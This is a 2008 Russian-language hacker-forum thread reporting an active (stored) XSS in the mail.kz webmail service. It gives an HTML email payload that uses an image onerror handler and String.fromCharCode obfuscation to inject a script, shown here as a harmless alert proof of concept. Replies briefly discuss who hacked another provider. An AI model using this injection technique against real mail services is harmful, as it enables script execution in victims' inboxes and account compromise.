mail.kz [Active XSS]

Discussion in 'Уязвимости Mail-сервисов' started by slider, 25 Mar 2008.

  1. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    501
    Likes Received:
    711
    Reputations:
    748
    Может кому нить пригодится....

    Отправляем письмо в html формате с содержанием:

    HTML:
    <image src="" onerror=document.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,34,115,108,105,100,101,114,34,41,60,47,115,99,114,105,112,116,62))>
    в чаре:
    HTML:
    60,115,99,114,105,112,116,62,97,108,101,114,116,
40,34,115,108,105,100,101,114,34,41,60,47,115,99,114,105,112,116,62
    следующее:
    HTML:
    <script>alert("slider")</script>
     
    #1 slider, 25 Mar 2008
    Last edited: 25 Mar 2008
    7 people like this.
  2. W!z@rD

    W!z@rD Борец за русский язык

    Joined:
    12 Feb 2006
    Messages:
    973
    Likes Received:
    290
    Reputations:
    43
    вспоминается "скандал" с нурсатом, это твоих рук дело? =\
     
    #2 W!z@rD, 25 Mar 2008
  3. NFM

    NFM Reservists Of Antichat

    Joined:
    16 Jan 2006
    Messages:
    308
    Likes Received:
    191
    Reputations:
    22
    это не его рук дело, ломанул нурсат чатти2
     
    #3 NFM, 25 Mar 2008
  4. W!z@rD

    W!z@rD Борец за русский язык

    Joined:
    12 Feb 2006
    Messages:
    973
    Likes Received:
    290
    Reputations:
    43
    кто это сказал?
     
    #4 W!z@rD, 29 Mar 2008
  5. NFM

    NFM Reservists Of Antichat

    Joined:
    16 Jan 2006
    Messages:
    308
    Likes Received:
    191
    Reputations:
    22
    я это сказал=)
     
    #5 NFM, 29 Mar 2008
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.